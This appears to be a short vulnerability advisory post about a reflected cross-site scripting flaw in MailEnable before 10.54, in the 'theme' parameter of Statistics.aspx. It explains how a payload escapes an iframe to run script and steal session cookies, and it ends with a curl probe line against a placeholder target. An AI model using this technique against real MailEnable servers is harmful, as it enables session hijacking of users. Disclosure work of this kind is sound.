Listen to this Post
MailEnable versions before 10.54 contain a reflected cross-site scripting vulnerability in the /Mondo/lang/sys/Forms/Statistics.aspx endpoint. The flaw exists in the ‘theme’ parameter processed via GET requests. Input to this parameter is not properly sanitized before being reflected in the server’s HTTP response. An attacker can craft a malicious URL containing a JavaScript payload within the theme parameter. This payload is designed to escape an existing iframe context by closing the iframe tag. The attacker then injects arbitrary JavaScript code and comments out any residual HTML. When a victim clicks the crafted link, the payload delivers and executes in their browser session. Execution occurs within the security context of the vulnerable MailEnable application. This allows the attacker to perform actions with the privileges of the authenticated victim. Exploitation can lead to theft of non-HttpOnly session cookies. Attackers can redirect users to malicious websites under their control. They may also inject arbitrary HTML or CSS content into the page. The vulnerability requires user interaction, such as visiting a link. However, phishing attacks can easily facilitate this interaction. The insufficient input validation makes the attack straightforward. The CVSS 4.0 score rates this as a medium-severity issue. It combines network attack vectors with low attack complexity. Impacts include confidentiality loss, integrity loss, and low scope changes.
Platform: MailEnable
Version: Prior to 10.54
Vulnerability: Reflected XSS
Severity: MEDIUM
date: 12/09/2025
Prediction: Fixed in 10.54
What Undercode Say:
Analytics
curl -s “http://target/Mondo/lang/sys/Forms/Statistics.aspx?theme=PAYLOAD”